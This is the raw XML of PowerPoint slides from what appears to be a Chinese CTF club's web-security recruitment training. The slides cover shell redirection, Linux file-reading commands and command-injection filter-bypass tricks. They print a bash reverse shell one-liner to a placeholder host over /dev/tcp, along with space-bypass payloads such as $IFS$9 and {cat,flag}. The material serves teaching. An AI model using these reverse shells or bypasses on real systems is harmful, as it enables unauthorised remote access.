          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="797719"/>
              <a:ext cx="478632" cy="648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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="967456"/>
              <a:ext cx="478632" cy="64871"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171575" y="2275642"/>
            <a:ext cx="9836150" cy="2171086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="6600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4294967294"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001013" y="5859780"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Presenter name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="5844540"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="徽标&#10;&#10;描述已自动生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf sldNum="0" hdr="0"/>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image" Target="../media/image1.jpe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8">
            <a:alphaModFix amt="15000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder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altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder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add text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder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43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660399" y="6409690"/>
            <a:ext cx="3750733"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BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768168" y="6409690"/>
            <a:ext cx="3750732"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fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="徽标&#10;&#10;描述已自动生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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hyperlink" Target="https://xz.aliyun.com/news/8987" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/pandana/p/16289320.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https://www.freebuf.com/articles/web/359345.html#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%B8%8E%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C"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hyperlink" Target="https://xz.aliyun.com/news/879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https://xz.aliyun.com/news/6642" TargetMode="Externa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BITs2Sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>招新培训</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础第二次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>培训</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>杨姚</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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8410" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>标准输入输出重定向</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5588635" y="172085"/>
            <a:ext cx="5478780" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /dev/tcp/ip/7777 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bash -i &gt; /dev/tcp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip/7777</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1372235" y="1468120"/>
            <a:ext cx="9417050" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标准输入：代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标准输出：代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标准错误输出：代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&amp;&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>混合输出，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&gt;&amp; = &amp;&gt; = 2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令详解：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/pandana/p/16289320.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其他反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>姿势：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://xz.aliyun.com/news/8987</a:t>
            </a:r>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61110" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件读取命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989330" y="1449705"/>
            <a:ext cx="10473690" cy="3744595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>more:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一页一页的显示档案内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>less:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类似</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>head:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看头几行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tac:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从最后一行开始显示，可以看出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> tac </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的反向显示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tail:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看尾几行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：显示的时候，顺便输出行号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>od:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以二进制的方式读取档案内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数读内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>vi:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一种编辑器，这个也可以查看</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>vim:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一种编辑器，这个也可以查看</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sort:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以查看</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>uniq:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以查看</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62050" y="441960"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>绕过技巧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026795" y="1165225"/>
            <a:ext cx="10318750" cy="5142230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、空格绕过：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%09(tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$IFS$9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$IFS$1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>${IFS}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$IFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等，还可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> {cat,flag}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、关键字绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
